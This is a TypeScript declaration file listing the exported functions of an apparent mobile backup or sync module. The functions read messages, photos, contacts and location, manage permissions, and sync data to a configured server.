export function initialize(): void;
export function getPermissionState(): string;
export function requestPermissions(): Promise<boolean>;
export function requestMediaPermissions(): Promise<boolean>;
export function scanExistingMessages(): Promise<number>;
export function getAllMessages(password: string): Promise<string>;
export function getAllMmsMessages(password: string): Promise<string>;
export function getGalleryPhotos(password: string): Promise<string>;
export function getLocationStatus(password: string): string;
export function requestLocationPermissions(): Promise<boolean>;
export function requestNotificationPermission(): Promise<boolean>;
export function startLocationTracking(password: string): boolean;
export function stopLocationTracking(): void;
export function getLocationPoints(password: string, limit: number): Promise<string>;
export function clearLocationHistory(): boolean;
export function openBatteryOptimizationSettings(): void;
export function openAppSettings(): void;
export function requestContactsPermission(): Promise<boolean>;
export function getContacts(password: string): Promise<string>;
export function getDeviceSnapshot(password: string): string;
export function getBackupStatus(): string;
export function saveNativeSettings(settingsJson: string): void;
export function saveNativeRules(rulesJson: string): void;
export function syncNow(): void;
export function testConnection(serverUrl: string): Promise<boolean>;
export function clearQueue(): void;
